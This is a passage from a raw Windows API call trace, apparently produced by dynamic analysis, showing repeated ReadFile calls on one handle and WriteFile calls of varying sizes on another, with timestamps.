lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.515] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.516] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.517] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.517] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.517] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x377, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.518] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.518] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.519] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.519] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.520] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.520] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.521] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.521] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.522] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.522] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.523] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.523] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.524] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x83, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.524] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.524] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x366, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.525] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.525] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.526] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.526] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.527] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.527] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.528] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.528] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.529] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.529] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.530] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.530] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.530] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.531] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.531] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.532] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.533] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.533] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.533] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.534] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.534] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.535] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.535] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.536] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.537] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.537] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.538] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.539] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.539] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x327, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.540] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.541] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.541] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.542] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.542] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.544] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.544] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x341, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.545] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.545] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.546] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.546] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.547] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.547] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.548] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.548] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.549] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.549] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.550] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.550] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.551] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.551] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.552] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.552] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.552] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.553] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.553] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.554] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.554] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.555] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.555] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.556] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.556] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.557] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.557] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.557] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.558] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.558] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.559] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.559] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.560] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.560] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.561] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.561] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.562] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 